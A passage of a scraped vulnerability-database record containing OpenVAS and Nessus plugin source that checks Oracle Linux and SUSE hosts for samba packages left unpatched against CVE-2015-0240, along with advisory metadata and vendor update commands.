$\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:23 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0250\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0250 - samba4 security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0250\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0250.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:23", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0249", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123184", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123184", "title": "Oracle Linux Local Check: ELSA-2015-0249", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0249.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123184\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:25 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0249\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0249 - samba3x security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0249\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0249.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:23", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0252", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123183", "title": "Oracle Linux Local Check: ELSA-2015-0252", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0252.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123183\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:24 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0252\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0252 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0252\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0252.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libwbclient\", rpm:\"libwbclient~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-dc\", rpm:\"samba-dc~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-dc-libs\", rpm:\"samba-dc-libs~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-pidl\", rpm:\"samba-pidl~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-test\", rpm:\"samba-test~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-test-devel\", rpm:\"samba-test-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-vfs-glusterfs\", rpm:\"samba-vfs-glusterfs~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-modules\", rpm:\"samba-winbind-modules~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "samba was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-0240: Don", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0353-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83687", "published": "2015-05-20T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2015:0353-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0353-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83687);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2015:0353-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"samba was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-0240: Don't call talloc_free on an\n uninitialized pointer (bnc#917376).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=872912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=873922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=876312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=889175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=908627\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=913238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0240/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150353-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3122dc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-91=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-91=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-91=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgensec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgensec0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libregistry0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libregistry0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-raw0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-raw0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 